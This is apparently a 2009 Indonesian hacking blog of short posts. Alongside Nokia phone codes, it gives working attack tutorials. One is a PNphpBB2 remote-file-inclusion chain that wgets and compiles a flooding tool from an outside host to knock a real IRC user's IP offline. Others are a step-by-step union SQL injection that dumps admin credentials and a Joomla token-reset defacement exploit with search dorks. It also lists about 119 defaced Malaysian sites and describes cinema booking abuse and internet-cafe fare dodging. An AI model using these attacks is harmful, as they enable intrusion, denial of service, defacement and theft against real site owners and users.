Berikut ini adalah kunci kode tombol rahasia yang dapat anda jalankan sendiri dengan mengetiknya di keypad hp ponsel anda yang bermerek Nokia baik yang cdma maupun yang gsm.

1. Melihat IMEI (International Mobile Equipment Identity)
Caranya tekan * # 0 6 #

2. Melihat versi software, tanggal pembuatan softwre dan jenis kompresi software
Caranya tekan * # 0 0 0 0 #
Jika tidak berhasil coba pencet * # 9 9 9 9 #

3. Melihat status call waiting
Caranya tekan * # 4 3 #

4. Melihat nomor / nomer private number yang menghubungi ponsel anda
Caranya tekan * # 3 0 #

5. Menampilkan nomer pengalihan telepon all calls
Caranya tekan * # 2 1 #

6. Melihat nomor penelepon pada pengalihan telepon karena tidak anda jawab (call divert on)
Caranya tekan * # 6 1 #

7. Melihat nomor penelepon pada pengalihan telepon karena di luar jangkauan (call divert on)
Caranya tekan * # 6 2 #

8. Melihat nomor penelepon pada pengalihan telepon karena sibuk (call divert on)
Caranya tekan * # 6 7 #

9. Merubah logo operator pada nokia type 3310 dan 3330
Caranya tekan * # 6 7 7 0 5 6 4 6 #

10. Menampilkan status sim clock
Caranya tekan * # 7 4 6 0 2 5 6 2 5 #

11. Berpindah ke profil profile ponsel anda
Caranya tekan tombol power off tanpa ditahan

12. Merubah seting hp nokia ke default atau pabrikan
Caranya tekan * # 7 7 8 0 #

13. Melakukan reset timer ponsel dan skor game ponsel nokia
Caranya tekan * # 7 3 #

14. Melihat status call waiting
Caranya tekan * # 4 3 #

15. Melihat kode pabrik atau factory code
Caranya tekan * # 7 7 6 0 #

16. Menampilkan serial number atau nomer seri hp, tanggal pembuatan, tanggal pembelian, tanggal servis terakhir, transfer user data. Untuk keluar ponsel harus direset kembali.
Caranya tekan * # 92702689 #

17. Melihat kode pengamanan ponsel anda
Caranya tekan * # 2 6 4 0 #

18. Melihat alamat ip perangkat keras bluetooth anda
Caranya tekan * # 2 8 2 0 #

19. Mengaktifkan EFR dengan kualitas suara terbaik namun boros energi batere. Untuk mematikan menggunakan kode yang sama.
Caranya tekan * # 3 3 7 0 #

20. Mengaktifkan EFR dengan kualitas suara terendah namun hemat energi batere. Untuk mematikan menggunakan kode yang sama.
Caranya tekan * # 4 7 2 0 #

21. Menuju isi phone book dengan cepat di handphone nokia
Caranya tekan nomer urut lalu # contoh : 150#

22. Mengalihkan panggilan ke nomor yang dituju untuk semua panggilan
Caranya tekan * * 2 1 * Nomor Tujuan #

23. Mengalihkan panggilan ke nomor yang dituju untuk panggilan yang tidak terjawab
Caranya tekan * * 6 1 * Nomor Tujuan #

24. Mengalihkan panggilan ke nomor yang dituju untuk panggilan ketika telepon hp anda sedang sibuk
Caranya tekan * * 6 7 * Nomor Tujuan #

Keterangan Tambahan :
- Kode diinput tanpa spasi
- Ada kode-kode nokia yang berlaku pada tipe tertentu saja
---END---
Sumber: yogiehacker.blogspot.com
Penulis: Yogie

Bug XSS on Indosiar.com

2009-09-24T18:15:00.002+07:00

Tadi lagi nonton BBF (Boys Before ~~Fired~~ ~~Flooded~~ Flowers) (1 detik kemudian mau muntah rasanya...) Trus saya lagi di depan komputer, lagi SoNet-ing (Social Networking) dan Blogging, dan muncul suatu niat yang sedikit jahat yaitu buka situsnya di: www.indosiar.com dan cek bugs XSS-nya (maklum, masi newbie) dan JERENG!!!
Ternyata di search engine-nya ada bug XSS-nya lhooo!!!
Bagi admin Indosiar.com supaya ngepatch Bug XSS-nya yaa...
---END---

Facebook Hacking (Online di kompi tanpa terlihat online)

2009-09-24T15:42:00.003+07:00

Kata kakak saya, kalo online aka OL di HP gak keliatan Online kalo di komputer...
Tapi, kalo OL di HP ngelag, gak cepet...
Nah, kalo kita online di Komputer tapi buka-nya HP, bisa kan???
Ok, saya kasih linknya: DISINI BOZZ

---END---

DDoS Reloaded

2009-09-24T12:11:00.002+07:00

Ini adalah Tutorial DDoS dari J4mbi H4ck3r
Dork: inurl:/index.php?name=PNphpBB2
Tutorial:
1. Misalnya dapet korban: http://www.defendersofmodan.net/index.php?name=PNphpBB2

2. Kemudian hapus/delete index.php?name=PNphpBB2 di url/browsing sehingga menjadi http://www.defendersofmodan.net

3. Masukkan bug ini di belakang situs tadi :

modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

4. Masukkan file inject ini di belakang nya lagi :

http://www.geocities.com/jambihackerlinkcrew/sql.htm

Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/jambihackerlinkcrew/sql.htm?&cmd=pwd

Jangan lupa memasukkan command Unix di ujungnya

5. Masukkan file tembak.c ini di belakang nya lagi :

http://www.freewebs.com/jambihackerlink/tembak.c

Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=wget http://www.freewebs.com/jambihackerlink/tembak.c -O /var/tmp/tembak.c

6. Kemudian Compile file tembak.c

http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=gcc -o /var/tmp/jambihackerlink /var/tmp/tembak.c

7. Utk mendapatkan IP target, buka Mirc trus join salah satu canel di Dalnet. Arahkan mouse ke salah satu nickname di canel itu trus klik kanan lalu pilih Whois

misal nya

ce_sweet83 is ~cute_83@202.155.150.70 * ce_cute

Kemudian kita cari keberadaan IP tersebut, misal nya http://www.dnsstuff.com/tools/whois.ch?ip=202.155.150.70
Ternyata target nya menggunakan ISP : Indosat Internet Service Providers

8. Skrg kita serang dgn DDOS supaya target nya Disconnect dari Dalnet (ingat, bandwith kamu harus lebih besar utk melakukan DDOS).

misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=/var/tmp/./jambihackerlink ip port

http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=/var/tmp/./jambihackerlink 202.155.150.70 22 atau 202.155.150.70 53

Tunggu beberapa saat....... otomatis target nya akan Disconnect dari Dalnet.
---END---
Penulis: J4mbi H4cker
Thanks to: J4mbi H4ck3r

Smiley JavaScript (100% Illegal)

2009-09-23T11:51:00.004+07:00

Ini adalah Script Smiley yang saya ambil dari Shoutmix (Illegal kan?)
Nah, sekarang copas script ini ke Notepad lalu Upload ke Web Hosting anda...
var smileyList = [
[':)', 'www.shoutmix.com/smileys/smile.gif'],
[':(', 'www.shoutmix.com/smileys/sad.gif'],
[';)', 'www.shoutmix.com/smileys/wink.gif'],
[':D', 'www.shoutmix.com/smileys/grin.gif'],
[':P', 'www.shoutmix.com/smileys/tongue.gif'],
['B-)', 'www.shoutmix.com/smileys/cool.gif'],
[':">', 'www.shoutmix.com/smileys/blush.gif'],
[':((', 'www.shoutmix.com/smileys/cry.gif'],
['8-)', 'www.shoutmix.com/smileys/rolleyes.gif'],
['O_o', 'www.shoutmix.com/smileys/surprised.gif'],
['/:)', 'www.shoutmix.com/smileys/suspicious.gif'],
[':eek:', 'www.shoutmix.com/smileys/eek.gif'],
['>:)', 'www.shoutmix.com/smileys/twisted.gif'],
[':thumbsup:', 'www.shoutmix.com/smileys/thumbsup.gif'],
[':argh:', 'www.shoutmix.com/smileys/argh.gif'],
[':banghead:', 'www.shoutmix.com/smileys/banghead.gif'],
[':drool:', 'www.shoutmix.com/smileys/drool.gif'],
[':wise:', 'www.shoutmix.com/smileys/wise.gif'],
[':shrug:', 'www.shoutmix.com/smileys/shrug.gif'],
[':love:', 'www.shoutmix.com/smileys/love.gif'],
[':buttrock:', 'www.shoutmix.com/smileys/buttrock.gif'],
['^O^', 'www.shoutmix.com/smileys/notworthy.gif'],
];
Kalo anda mau bikin yang lain, tambahin aja kayak gini:
['(Teks yg ingin diganti emo)', '(url gambar emo)'],
Lalu, anda pasang JavaScript ini ke dalam Website yang ingin ditambahkan emoticons:
<script type="text/javascript" src="(URL JavaScript anda)"></script>

NAH! SEPERTI ITU RAHASIANYA!!!
---END---
Thanks to: Shoutmix

Robots.txt

2009-09-23T07:47:00.002+07:00

Tau Googlebot? Googlebot adalah sebuah robot yang dibuat untuk mencari informasi baru dari suatu website supaya bisa mengindex di Google, tapi kita bisa kontrol Googlebot untuk tidak mengindex beberapa halaman dengan robots.txt. Nah, kita akan melihat robots.txt dari om google (Coba aja ketik di address bar: www.google.com/robots.txt), nah, sekarang udah telanjang tuh directorinya... Jadi kita bisa mendapatkan admin login lewat robots.txt
---END---
Penulis: cybermuttaqin dari Jasakom

Menembus blocked Website ato IP kita sendiri keblok...

2009-09-21T22:39:00.002+07:00

OK, kalo anda di kantor biasanya facebook diblok atau anda pernah bermasalah dengan webmaster ato admin jadi IP kamu tidak bisa masuk ke situs, nah, saya akan mengajarkan 2 cara untuk menebus proteksinya, yaitu:
1. Pake proxy (Gampang... ikutin aja langkah-langkah setiap tools ato add-ons)
2. Langsung pergi ke server: (kalo IP kita yang diblok, gak bisa dipake...)
cara:
- Buka cmd
- ketik "ping (address)" tanpa tanda kutip, misal: ping www.facebook.com
- Lalu copas IP addressnya
- paste ke address bar
- rebes... eh salah, beres...

HOW IT CAN BE???
1. Yep, anda pasti tau cara kerja proxy, yang gak tau, coba liat gambar-gambar dibawah ini:

Gambar atas adalah apa yang terjadi jika tidak memakai proxy, yaitu terjadi interaksi secara langsung antara Client dengan Web server.
Lalu, jika Web server diblok, ato webserver memblok ip kita, lalu kitapun memakai proxy, jadinya seperti ini:

Web server tidak berinteraksi dengan Client, jika Web server memblok IP kita, tidak akan ketauan karena IP yang terpampang disitu adalah Proxy! Jika kita yang diblok, kita koneksi ke proxy server, dan tidak langsung menyentuh Web server, jadi bisa dijelasin kayak gini:
Aldi (Client) tidak diperbolehkan keluar rumah (apapun alasannya tidak boleh!), padahal dia ingin beli permen, jadi, dia meminta pembantunya (Proxy) untuk membelikannya permen, lalu si pembantu pergi ke warung (Web server) untuk beli permen, lalu pulang memberikan permen yang dibeli ke Aldi... jadi si penjaga warung gak tau kalo Aldi yang beli... (secara tidak langsung, Aldi sudah membeli permen)
Tentang Proxy sudah, yang terakhir, cmd, mengapa bisa terjadi?
Terjadi karena website yang diblok cuma Domain name-nya doank... bukan sekaligus dengan IP-nya (tapi gak tau juga deh, kalo bossnya juga Hacker trus ngesetnya sama-sama dengan IP-nya...) Tapi kalo IP kita yang diblok sama Web Server ya pastilah gak bisa, soalnya web server gak menerima koneksi langsung kepada IP kita walaupun ngaksesnya lewat IP...
Sekian Postingannya...
---END---

Ghostly Shoutmix

2009-09-21T13:07:00.002+07:00

---1|\|7R0|)U(710|\|---
Tau Shout Mix? itu lhooo diatas itu!!! Shoutmix! itu adalah tempat untuk chat dengan pengunjung website... Tapi, kita bisa menjadi hantu.

---3FF3(7---
Kita bisa jadi hantu lagi ngechat di shoutmix, jadi gak keliatan di situs tersebut. (tapi kadang-kadang gak dianggep karena kadang-kadang orang gak ngeliat berapa banyak yg online... tapi efektif jika langsung banyak-banyak user yang jadi hantu ngejunk terus)

---7U70R14|_---
1. Menuju website yang sepi (menakuti orang minimal 2 org online termasuk anda, cara melihat berapa yg online adalah liat aja gambar seperti ini di situs tersebut:)
2. Lalu liat Source Codenya (Mozilla Serigala Api: klik View lalu View Source Code)
3. Search www.shoutmix.com, cari aja deket-deket situ ada www(nomor server).shoutmix.com/(nama shoutmix) lalu copas link tersebut ke address bar lalu Enter
4. JREENG!!! ada Sumber dari Shoutmix itu... Pake aja buat ngejunk (pake beberapa user)

---84641|\/|4|\|4 8154 73RJ4|)1?---
Karena Shoutmix pake Iframe dari suatu tempat yang disediakan untuk Shoutmix yang asli, jadi situs kita gak kebanyakan code... Tapi kita bisa menggunakannya untuk menjadi "hantu cyber" Hehehehehe...

END OF POSTING

Stupid Moderation (Operator Warnet)

2009-09-21T11:30:00.003+07:00

Dulu, belom ada akses Internet, saya sering pergi ke warnet (maen Dota dan maen internet) dan kami melihat ada sebuah kelemahan pada suatu warnet yaitu:
- Password setiap komputer sama (kalo kita mau maen, ngomong ke op-nya trus dikasih password, tapi setiap kompi sama passwordnya)
- Password setiap paket sama (misal: paket 1 (1 jam) password aa, paket 2 (2 jam) password aa juga... begitu seterusnya...)
- Operatornya suka maen RF (Critical Vulnerablities!!!)

Prosedur Hacking:
1. Ajak kira-kira 3 orang jika warnet sepi (batas minimal kesensitifan operator jika warnet sepi) Ajak kira-kira 7 orang jika warnet sedikit banyak, atau 9 orang jika rame (jika tempatnya pas untuk 10 orang bisa...)
2. Bilanglah ke Operator: "Mas, mau maen mas, 1 jam" lalu kamu kasih duitnya (sekedar kasih tau, 1 jam 4 ribu) Operator kasih passwordnya... Sesudah itu, suruh org laen yg kamu ajak nyalakan komp dan terserah paket berapapun (karena semua password sama)
3. Maen sepuasnya... dijamin 88% gak dicurigain karena Vulnerablities ketiga membuat Operator asik maen RF plus keramaian membuat Operator gak tau siapa aja yg tadi maen...
4. Langsung pulang, karena tadi sudah bayar... ^_^

Untested, tapi saya jamin 89,48278762% berhasil!!!

---END---

Hack Pesawat Telepon yang Terkunci

2009-09-21T09:00:00.002+07:00

Telepon....
Buatan Alexander Graham Bell...
Ini adalah benda yang hebat karena kita bisa berkomunikasi jarak jauh...
Tapi bagaimanakah cara Menelpon dalam keadaan telepon sedang terkunci???
Semua tombol angka terkunci! bagaimana anda akan menelpon?
Inilah caranya...
1. Angkat gagang Telepon...
2. Klik tombol dialnya... (GAK TAU? itu tuh, yang tombol yang biasa buat mutusin telepon yang ada pada dudukan telepon...) sebagai ganti nomor telepon, tapi bagaimana caranya??? tekan dialnya sebanyak angka pada nomor telepon. misalnya kamu mau telepon ke 021 8943238 jadi, kamu harus memencet dial sebanyak:
- 10x lalu diam sebentar (jangan lama-lama) menandakan memencet angka 0
- 2x lalu diam sebentar menandakan memencet angka 2
- 1x lalu diam sebentar menandakan memencet angka 1
- dan seterusnya...

Nah, kesimpulannya, semua system bisa dihack...
---END---
Sumber: www.spyrozone.net
Penulis: SpyroKiD

Selamat Hari Raya Idul Fitri

2009-09-20T09:19:00.003+07:00

Kami segenap penulis Darkness Hacker (cuma satu)
Mengucapkan Selamat Hari Raya Idul Fitri
Mohon Maaf Lahir dan Batin bagi yang merayakannya
P.S. /me gak merayakan... cuma ngasih selamat aja...

Cara memakai Exploit dari Milw0rm (SQLi Only)

2009-09-20T07:59:00.003+07:00

Di blognya YaDoY666, Saya melihat cerita YaDoY666 melawan orgil dari Malingsial yang menyerang Wordpress dengan Joomla Exploit Jadoel...
Dan saya juga melihat bahwa Maling juga nyerang dengan copas exploit milw0rm langsung (sama-sama dengan union+select+...... padahal itu cuma exploit buat beberapa situs yang nama columnnya sama, jumlah columnnya sama, dll.)
Nah, untuk Malingsial, saya buat postingan ini supaya kalian lebih creative dan lebih pinter (maunya disuap sama gue...)
Nih Caranya:
Misalnya kita dapet Exploit ini:
POC Exploit:
http://127.0.0.1/[path]/index.php?option=com_foobla_suggestions&controller=comment&idea_id=[Sqlinjection]
Nah, yg diatas itu, bisa dijadiin dork, tapi kalo mau dork yang lebih bagus, pake inurl:com_foobla_suggestion (diatas itu letak bugsnya)
Jangan copas exploit yang ini langsung ke web yang dituju: (Ini Exploitnya, kelanjutan dari atas kalo kita lanjutin SQLi)
/index.php?option=com_foobla_suggestions&controller=comment&idea_id=null+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+jos
_users
Yang diatas CUMA DEMO, kamu harusnya mulai dari: http://127.0.0.1/[path]/index.php?option=com_foobla_suggestions&controller=comment&idea_id=
Misalnya kita dapet korban:
http://127.0.0.1/index.php?option=com_foobla_suggestions&controller=comment&idea_id=20
Lalu kita kan lagi SQLi, kita tambahin Single Quotes kan?
Begitulah Seterusnnya... (SQLi)
OK, selamat milw0rm-ing
JADI KALO MAU COPAS JANGAN EXPLOITNYA, TAPI LETAK BUGSNYA (tapi disesuaikan juga sih sama component-nya)
Misalnya kita sudah tau kalo situs www.aaa.com punya component foobla suggestion, nah, berarti kita masukin di address bar:http://www.aaa.com/index.php?option=com_foobla_suggestions&controller=comment&idea_id=1 dan lakukan SQLi...
---END---

The Hacker, Mencari Hacker Lewat Om Google, The Dead of Noordin M Top Series...

2009-09-19T16:23:00.003+07:00

Semua luka itu masih terasa
Semua luka itu masih membekas Semua luka itu belum mengering
Semua luka itu belum hilang dari Dari hati kami, hati bangsa Indonesia

Beberapa waktu yang lalu kau hancurkan gedung-gedung dinegara kami
Beberapa waktu yang lalu kau hancurkan fasilitas yang kami bangun dengan keringat dan air mata
Beberapa waktu yang lalu kau sakiti saudara-saudara kami
Beberapa waktu yang lalu kau bunuh saudara-saudara kami

Kau telah menghancurkan semuanya Kau telah merusak bangsa kami dengan teror bom mu
Kau telah pengaruhi saudara kami untuk menyakiti saudaranya sendiri Kau telah merusak citra negara kami sebagai negara yang aman.

Kini engkau telah mati, Kini engkau telah kehilangan ragamu
Kini engkau telah menghadapnya ditangan bom yang kau rakit
Kini engkau harus pertanggung jawabkan semua kejahatan yang telah engkau lakukan

Hey Noordin, Kematianmu tidaklah cukup untuk mengobati luka-luka dihati ini
Hey Noordin, Kematianmu tidaklah cukup untuk membalaskan semua dendam kami

Semoga tidak ada lagi orang kejam seperti mu didunia ini
Jikapun ada kami segenap bangsa indonesia siap menghadapi orang-orang laknat sepertimu
Kami bangsa yang besar, kami tidak akan pernah takut atas semua teror mu itu.

Kesedihan ini memang masih bersisa... Walaupun Densus88 udah modarin tuh Noordin M Top...

Ini adalah beberapa Website yang di-deface dalam rangka "Kematian Noordin M Top":
[Dedicated to Indonesia]
1. http://suhz.net
2. http://lumina.com.my
3. http://www.alamtimur.com.my
4. http://www.anchorlink.com.my
5. http://www.ryjia.com.my
6. http://www.plischasia.com
7. http://www.konpro-group.com
8. http://www.pentateknik.com.my
9. http://www.crafsmy.com
10. http://www.ao.com.my
11. http://brimalstampress.com
12. http://www.ysegroup.com
13. http://easypack.com.my
14. http://www.rayaco.com.my
15. http://ccssb.com
16. http://www.impiantekad.com
17. http://www.houghton.com.my
18. http://chrla.net
19. http://jiahuahang.com
20. http://amaireauto.com
21. http://www.acmecom.com
22. http://ce-products.com
23. http://www.zainalcanopy.com
24. http://malaysian-express.com
25. http://www.tempcool.com.my
26. http://www.astroace.com.my
27. http://www.malimperformance.com
28. http://www.alamigroup.com
29. http://malimperformance.com
30. http://www.tomahawk-ind.com
31. http://arinexmy.com
32. http://www.cekaptera.com
33. http://berjayasewerage.com
34. http://www.ksridhammananda.com
35. http://www.ebiza.com.my
36. http://www.air-blowers.com.my
37. http://express-marble.com
38. http://chungmeng.com
39. http://www.immanex.com
40. http://www.aanetwork.info
41. http://www.slhc.com.my
42. http://www.jim.com.my
43. http://www.mes-online.com.my
44. http://www.dav.com.my
45. http://www.de-tag.com
46. http://acmecom.com
47. http://www.eceylinco.com
48. http://perfectmetal.com
49. http://www.ctflogistics.com
50. http://www.fluidsystems.com.my
51. http://www.astrauniforms.com
52. http://www.exxo.com.my
53. http://www.cellotron.com.my
54. http://www.ceylincoseylandevelopments.com
55. http://dtm.com.my
56. http://www.cannergy.com.my
57. http://www.intestmal.com
58. http://smartdor.com
59. http://www.frangipaniflora.com.my
60. http://eceydata.com
61. http://www.coolcare.biz
62. http://www.perfectmetal.com
63. http://ebathroom.com.my
64. http://www.kampat.com.my
65. http://royalcollegegroupof70.org
66. http://www.tyden.com.my
67. http://www.tobalidockyard.com
68. http://www.casa-impian.com
69. http://www.astrauniforms.com.my
70. http://www.cablestore.com.my
71. http://faacorp.com
72. http://brglobal.com
73. http://www.formahero.com.my
74. http://www.cissacom.com
75. http://www.easypack.com.my
76. http://signvec.com
77. http://www.cambridgetech.com.my
78. http://quantumatic-automation.com
79. http://www.eepro.com.my
80. http://www.slumberland.com.sg
81. http://fluidsystems-fssb.com
82. http://www.segarasia.com
83. http://www.greenyield.com.my
84. http://www.fitness.com.my
85. ctflogistics.com
86. http://www.people-station.com
87. http://www.eceyms.info
88. http://natural-country.com
89. http://www.cann.com.my
90. http://www.eepo.com.my
91. http://hulsmalaysia.com
92. http://www.brimalstampress.com
93. http://astrauniforms.com
94. http://intestmal.com
95. http://erlatech.com
96. http://www.senstech.com.my
97. http://www.allstartravel.com.my
98. http://flushngo.com
99. http://karmakarya.my
100.http://www.halal-world.com
101. http://www.ig.upm.edu.my/
102. http://foobeeveneer.com.my/
103. http://datiwellness.com.my/
104. http://www.sensepi.com/
105. http://yangshengong.com.my/
106. http://precioustime123.com/
107. http://lead2u.com.my/
108. http://www.malaysiaworms.com/
109. http://www.penternakanlintah.com/
110. http://www.wormbreeder.com/
111. http://www.eelmalaysia.com/
112. http://www.cacingmalaysia.com/
113. http://www.ternakancacing.com
114. http://www.malaysiabelut.com/
115. http://www.cacingmerah.com/
116. http://www.caci gjohor.com/
117. http://www.wormsbreeding.com
118. http://www.malaysiacacing.com
119. http://www.cacingkompos.com

Special Thanks to: Xshadow, inc0mp13te, Bi4kKob4r, PsyChotr0n, ju4ra, Jack-, Yadoy666, Gblack, IndoUnderground, Laharisi, t3cm4n, Cyber_Tomat, SasaIndahoz, MainHack brotherhood, ABC crew, SarkemHackerlink, Xcode, Jasakom, Kaskus, #IndonesiaUnite, Densus88, YOU!!

---END---
Sumber: yadoy666.serverisdown.org
Thanks to: Semua Defacer yang mendeface web diatas...

SQL Injection Full Version Revolution

2009-09-19T08:33:00.002+07:00

Ini adalah Tutorial Lengkap (langsung copas) dari SQL Injection
===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):

==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:

[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:

[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--

===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver
5 ini bisa menggunakan perintah From+Information_schema..

============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.
tables--

seumpama table yang muncul adalah "admin"

===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+
from+information_schema.tables+where+table_schema=database()--

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+
information_schema .columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+
information_schema .columns+where+table_name=0x61646D696E--

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password)
,6,7,8+from+admin--

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .

---END---
Special Thanks to: N4ck0
Grey Hat Hacker Indonesia

JADOEL TRICKS DEFACE WEBSITE (Joomla)

2009-09-19T07:24:00.002+07:00

Tutorial ini sudah tersebar kemana-mana, dan sudah JADOEL, yah, itung-itung nambah database... wkwkwkwk

OK, Tekhnik Deface Web ini dinamakan "Token". Mengapa? karena Token akan membawa kemenangan!

GO TO TUTOR DEH...
1. Cari Mangsa sama om google, dorknya: inurl:/index.php?option=com_user&view=reset&layout=confirm
2. Udah ketemu mangsa misalnya:
www.korban.com/index.php?option=com_user&view=reset&layout=confirm
3. Anda dihadapkan kepada sebuah Form untuk mengisikan "Token", isikan aja single quote (') lalu Lanjoet!!!
4. Jika berhasil, anda akan dihadapkan pada form reset password (Disuruh isi password baru dan mengulangnya), Jika enggak, ada tulisan yang memungkinkan anda salah memasukkan token yang salah, berarti udah dipatch! (Carilah mangsa lain)
5. Masukin aja password yang anda mau... (Terserah)
6. Jika sudah, anda 'mungkin' dihadapkan kepada login form, isikan nama admin lalu password yang tadi anda buat... Kalo enggak, cari aja admin loginnya sendiri...
7. Sudah masuk ke panel nih, ngapain? Lakukan sesuai imajinasi kalian, dan kesadisan anda... (DEFACE kek, apa kek, jadi kakek-kakek kek, dll.)

---END---

Rusuh di Blitzmegaplex lewat Komputer

2009-09-18T14:13:00.003+07:00

Effect: Ganti-ganti pesanan seat di Blitzmegaplex, jadi orang yang mau mesen malah udah dipesen, tetapi setengah jam kemudian, seat itu tersedia lagi...

Caranya:
1. Pergi ke www.blitzmegaplex.com
2. Klik "Ticket" di atas (Sejajar sama Home) Lalu muncul window baru
3. Pilih aja terserah bioskopnya, film apa, waktunya apa, tanggal berapa, sesuai kebutuhan, lalu klik Continue
4. Pilih aja 4 seat terserah, lalu pilih continue
5. Dihadapan ada Login form, abaikan saja, trus tutup aja window baru-nya...
6. Ulangi dari step 2 sampe puas
Mau diulang lagi?
Ulanglah 20 menit ato 30 menit kemudian...

Pada saat pengulangan, di step 4, liat deh, seat yang tadi kita pesen masih terpesan/pesenan kita nggak tersedia lagi (karena tadi kita udah pesen)

HAHAHAHA!!!
Cocok dipakai untuk isengin temen anda...

-----END-----
Special Thanks to: Th0r
Inspired by: How to Hack Cinema, same concept but have a different tutorial in www.th0r.info

Hack Lift

2009-09-17T18:49:00.002+07:00

Semua system bisa dihack, termasuk LIFT.
LIFT adalah sebuah benda yang besar untuk mengantarkan kita ke setiap lantai dalam gedung... (Menurut Wikipedia ala gw ^_^)

Effect:
Memakai lift tanpa hambatan dari orang lain (langsung ke lantai yg kita tuju tanpa harus berhenti-berhenti) Misalnya:
kita mau ke lantai 10, ada orang pengen ke lantai 4, jika kita lakukan Lift Hacking, Lift langsung ke lantai 10 tanpa berhenti di lantai 4.

Cara:
1. Tekan Buka dan Tutup secara bersamaan
2. Tekan Tutup dan Lantai Tujuan secara bersamaan

Silahkan pilih dari dua cara diatas, tapi INGAT! Itu dilakukan ketika lift sudah mulai berjalan, jangan sampai telat!

WARNING!
---Do it with your own risk!!!---
Misalnya:
- Ada penjaganya, trus kita lakukan Lift Hacking, nanti malah ditangkep
- Ada banyak orang ke lantai yg berbeda-beda, kalo kita lakukan Lift Hacking, nanti malah digebukin Bareng-bareng!
- Liftnya gak bisa dihack, pake cara Lift Hacking, error, berhenti, gak bisa dibuka, MASALAH BESAR!!!

---END---
By: Aswin Zuckerberg (Facebook)
Sumber: Group Hacker Indonesia di Facebook

Times Up, Rapidshare!!! (Rapidshare Hacking)

2009-09-16T17:48:00.000+07:00

---1|\|7R0|)U(710|\|---
Rapidshare adalah situs Sharing File antar user dunia maya... Taukah anda bahwa kita bisa mendapat hak Premium Account dengan Free User?

Ini adalah ilmu hacking dari SpyroKiD, Hehehe....

Effect:
Kalo download di Rapidshare, kalo pake Free User kita gak perlu nunggu beberapa puluh detik dulu... (Kayak pake Premium Account)

Tutor:
1. Copas link Download Rapidshare (terserah, yg pengen kamu download)
2. Klik Free User
3. Abaikan countdown untuk memperlihatkan tombol download
4. HAPUUUSSS Semua URL di Address Bar
5. Copas code ini ke Address Bar: javascript:alert(c=0)
6. Klik Enter!!!
7. Jangan panik jika ada alert, itu tanda-tanda kemenangan!

Nah! Langsung dah keliatan tuh Link Download...

---END---
Sumber: www.spyrozone.net
Penulis: SpyroKiD

Hmm, situs Deddy Corbuzier udah direpair toh...

2009-09-16T17:09:00.000+07:00

